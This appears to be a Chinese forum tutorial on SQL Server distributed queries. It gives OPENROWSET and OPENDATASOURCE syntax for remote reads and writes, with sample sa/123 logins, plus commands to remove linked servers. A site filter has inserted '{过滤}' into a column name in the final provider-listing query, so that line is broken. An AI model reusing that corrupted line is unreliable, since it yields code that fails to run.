SELECT * FROM OPENROWSET('SQLNCLI', 'server=sql服务器名或IP地
址;Trusted_Connection=yes','SELECT * FROM 数据库名.架构名.表名')
/*
例如:SELECT * FROM OPENROWSET
('SQLOLEDB','Server=192.168.58.208;Trusted_Connection=yes',Mydb.dbo.tb)
或:SELECT * FROM OPENROWSET
('SQLNCLI','Server=192.168.58.208;Trusted_Connection=yes',Mydb.dbo.tb)
或:SELECT * FROM OPENROWSET('SQLOLEDB','Server=192.168.58.208;Trusted_Connection=yes','SELECT *
FROM Mydb.dbo.tb')
或:SELECT * FROM OPENROWSET('SQLNCLI','Server=192.168.58.208;Trusted_Connection=yes','SELECT *
FROM Mydb.dbo.tb')
*/
--3.2.1.2 SQL认证方式查询(以下方法之一即可)
SELECT * FROM OPENROWSET
('SQLOLEDB', 'server=sql服务器名或IP地址;uid=用户名;pwd=密码',数据库名.架构名.表名)
SELECT * FROM
OPENROWSET('SQLNCLI', 'server=sql服务器名或IP地址;uid=用户名;pwd=密码',数据库名.架构名.表名)
SELECT * FROM OPENROWSET('SQLOLEDB', 'server=sql服务器名或IP地址;uid=用户名;pwd=密码','SELECT *
FROM 数据库名.架构名.表名')
SELECT * FROM OPENROWSET('SQLNCLI', 'server=sql服务器名或IP地址;uid=
用户名;pwd=密码','SELECT * FROM 数据库名.架构名.表名')
SELECT * FROM OPENROWSET('SQLOLEDB', 'sql
服务器名';'用户名'; '密码',数据库名.架构名.表名)
SELECT * FROM OPENROWSET('SQLNCLI', 'sql服务器名
';'用户名'; '密码',数据库名.架构名.表名)
SELECT * FROM OPENROWSET('SQLOLEDB', 'sql服务器名';'用户
名'; '密码','SELECT * FROM 数据库名.架构名.表名')
SELECT * FROM OPENROWSET('SQLNCLI', 'sql服务器
名';'用户名'; '密码','SELECT * FROM 数据库名.架构名.表名')
/* 例如:SELECT * FROM OPENROWSET
('SQLOLEDB','server=192.168.58.208;uid=sa;pwd=123',mydb.dbo.tb)
或:SELECT * FROM OPENROWSET
('SQLNCLI','server=192.168.58.208;uid=sa;pwd=123',mydb.dbo.tb)
或:SELECT * FROM OPENROWSET
('SQLOLEDB','server=192.168.58.208;uid=sa;pwd=123','SELECT * FROM Mydb.dbo.tb')
或:SELECT * FROM OPENROWSET('SQLNCLI','server=192.168.58.208;uid=sa;pwd=123','SELECT * FROM
Mydb.dbo.tb')
或:SELECT * FROM OPENROWSET('SQLOLEDB','192.168.58.208';'sa';'123',mydb.dbo.tb)
或:SELECT * FROM OPENROWSET('SQLNCLI','192.168.58.208';'sa';'123',mydb.dbo.tb)
或:SELECT * FROM OPENROWSET('SQLOLEDB','192.168.58.208';'sa';'123','SELECT * FROM Mydb.dbo.tb')
或:SELECT * FROM OPENROWSET('SQLNCLI','192.168.58.208';'sa';'123','SELECT * FROM Mydb.dbo.tb')
*/
--3.2.2 导入示例
--3.2.2.1 导入所有列
INSERT OPENROWSET('SQLOLEDB', 'server=sql服务器名或IP地
址;uid=用户名;pwd=密码',数据库名.架构名.表名)
SELECT * FROM 本地表
/* 例如:INSERT OPENROWSET
('SQLOLEDB','server=192.168.58.208;uid=sa;pwd=123',mydb.dbo.tb)
SELECT * FROM tb
*/
--3.2.2.2 导入
指定列
INSERT OPENROWSET('SQLOLEDB', 'server=sql服务器名或IP地址;uid=用户名;pwd=密码',数据库名.架
构名.表名)(列,列...)
SELECT 列,列... FROM 本地表
/* 例如:INSERT OPENROWSET
('SQLOLEDB','server=192.168.58.208;uid=sa;pwd=123',mydb.dbo.tb)(RANGE,LEVEL,Persons)
SELECT
RANGE,LEVEL,Persons FROM tb
*/
--注:更多替代方法参考.2.1查询示例,只需替换行集函数(OPENROWSET)内
的内容即可。
--3.2.3 更新示例
UPDATE OPENROWSET('SQLOLEDB', 'server=sql服务器名或IP地址;uid=用户名
;pwd=密码',数据库名.架构名.表名)
SET 字段='值'
WHERE 字段='条件'
/*例如:UPDATE OPENROWSET
('SQLOLEDB','server=192.168.58.208;uid=sa;pwd=123',mydb.dbo.tb)
SET Persons='g'
WHERE Persons='a'
*/
--注:更多替代方法参考.2.1查询示例,只需替换行集函数(OPENROWSET)内的内容即可。
--3.2.4 删除示
例
DELETE OPENROWSET('SQLOLEDB', 'server=sql服务器名或IP地址;uid=用户名;pwd=密码',数据库名.架构名
.表名)
WHERE 字段名='条件'
/*
例如:DELETE OPENROWSET('SQLOLEDB','server=192.168.58.208;uid=sa;pwd=123',mydb.dbo.tb)
WHERE
Persons='g'
*/
--注:
更多替代方法参考.2.1查询示例,只需替换行集函数(OPENROWSET)内的内容即可。
--3.3 OPENDATASOURCE方法
(不需要用到创建好的链接名。如果连接的实例名不是默认的,需要在"sql服务器名或IP地址"后加上"\实例名
")
--3.3.1
查询示例
--3.3.1.1 Windows认证方式查询(以下方法之一即可)
SELECT * FROM OPENDATASOURCE('SQLOLEDB',
'server=sql服务器名或IP地址;Trusted_Connection=yes').数据库名.架构名.表名
SELECT * FROM
OPENDATASOURCE('SQLNCLI', 'server=sql服务器名或IP地址;Trusted_Connection=yes').数据库名.架构名.
表名
/*
例如:SELECT * FROM OPENDATASOURCE
('SQLOLEDB','Server=192.168.58.208;Trusted_Connection=yes').Mydb.dbo.tb
或:SELECT * FROM OPENDATASOURCE
('SQLNCLI','Server=192.168.58.208;Trusted_Connection=yes').Mydb.dbo.tb
*/
--3.3.1.2
SQL认证方式查询(以下方法之一即可)
SELECT * FROM OPENDATASOURCE('SQLOLEDB', 'server=sql服务器名或
IP地址;uid=用户名;pwd=密码').
数据库名.架构名.表名
SELECT * FROM OPENDATASOURCE('SQLNCLI', 'server=sql服务器名或IP地址;uid=用户
名;pwd=密码').
数据库名.架构名.表名
SELECT * FROM OPENDATASOURCE('SQLOLEDB', 'Data Source=sql服务器名或IP地
址;uid=用户名;pwd=密码').
数据库名.架构名.表名
SELECT * FROM OPENDATASOURCE('SQLNCLI', 'Data Source=sql服务器名或IP地
址;uid=用户名;pwd=密码').
数据库名.架构名.表名
/* 例如:SELECT * FROM OPENDATASOURCE
('SQLOLEDB','Server=192.168.58.208;uid=sa;pwd=123').mydb.dbo.tb
或:SELECT * FROM OPENDATASOURCE('SQLNCLI','Server=192.168.58.208;uid=sa;pwd=123').mydb.dbo.tb
或:SELECT * FROM OPENDATASOURCE('SQLOLEDB','Data
Source=192.168.58.208;uid=sa;pwd=123').mydb.dbo.tb
或:SELECT * FROM OPENDATASOURCE('SQLNCLI','Data
source=192.168.58.208;uid=sa;pwd=123').mydb.dbo.tb
*/
导入所有列
INSERT OPENDATASOURCE('SQLOLEDB', 'server=sql服务器名或IP地址;uid=用户名;pwd=密码').数
据库名.架构名.表名
SELECT * FROM 本地表
/*
例如:INSERT OPENDATASOURCE('SQLOLEDB','server=192.168.58.208;uid=sa;pwd=123').mydb.dbo.tb
SELECT
* FROM tb
*/
--3.3.2.2
导入指定列
INSERT OPENDATASOURCE('SQLOLEDB', 'server=sql服务器名或IP地址;uid=用户名;pwd=密码').数
据库名.架构名.表名(列,列...)
SELECT 列,列... FROM 本地表
/*
例如:INSERT OPENDATASOURCE('SQLOLEDB','server=192.168.58.208;uid=sa;pwd=123').mydb.dbo.tb
(RANGE,LEVEL,Persons)
SELECT RANGE,LEVEL,Persons FROM tb
*/
--注:
更多替代方法参考.3.1查询示例,只需替换行集函数(OPENDATASOURCE)内的内容即可。
--3.3.3 更新示例
UPDATE OPENDATASOURCE('SQLOLEDB', 'server=sql服务器名或IP地址;uid=用户名;pwd=密码').
数据库名.架构名.表名
SET 字段='值'
WHERE 字段='条件'
/*例如:UPDATE OPENDATASOURCE
('SQLOLEDB','server=192.168.58.208;uid=sa;pwd=123').mydb.dbo.tb
SET Persons='g'
WHERE Persons='a'
*/
--注:
更多替代方法参考.3.1查询示例,只需替换行集函数(OPENDATASOURCE)内的内容即可。
--3.3.4 删除示例
DELETE OPENDATASOURCE('SQLOLEDB', 'server=sql服务器名或IP地址;uid=用户名;pwd=密码').
数据库名.架构名.表名
WHERE 字段名='条件'
/*例如:DELETE OPENDATASOURCE
('SQLOLEDB','server=192.168.58.208;uid=sa;pwd=123').mydb.dbo.tb
WHERE Persons='g'
*/
--注:更多替代
方法参考.3.1查询示例,只需替换行集函数(OPENDATASOURCE)内的内容即可。
--
删除链接服务器方法
--如果以后不再使用时可删除链接信息
--4.1
删除登录信息(或叫删除链接服务器登录名映射)
EXEC sp_droplinkedsrvlogin 'LinkName',NULL
/*
例如:EXEC sp_droplinkedsrvlogin 'TonyLink',NULL */
--4.2
删除链接服务器名称
EXEC sp_dropserver 'LinkName','droplogins' --如果指定droplogins,
则在删除链接服务器之前要删除登录名映射
/*例如:EXEC sp_dropserver 'TonyLink','droplogins' */
--附
:
获取Provider Name的方法(EXEC master..xp_enum_oledb_providers)
SELECT CAST([Provider Name] AS
VARCHAR(30)) ProviderName,
CAST([Provider Descrip{过滤}tion] AS VARCHAR(60)) ProviderDescrip{过滤}tion
FROM
OPENROWSET(
'SQLOLEDB',
'Server=.;Trusted_Connection=yes',
'SET FMTONLY OFF;
EXEC
master..xp_enum_oledb_providers'
)
|
上一篇:UCloud漏洞处理流程与奖励细节下一篇:今天就能做火车回家了,已经半年多没回家了
|
|手机版|小黑屋|架构师
( 鲁ICP备14021824号-2 )|网站地图
发表于 2015-9-28 18:21:41
发表于 2017-9-27 17:43:11
很详细 谢谢
楼主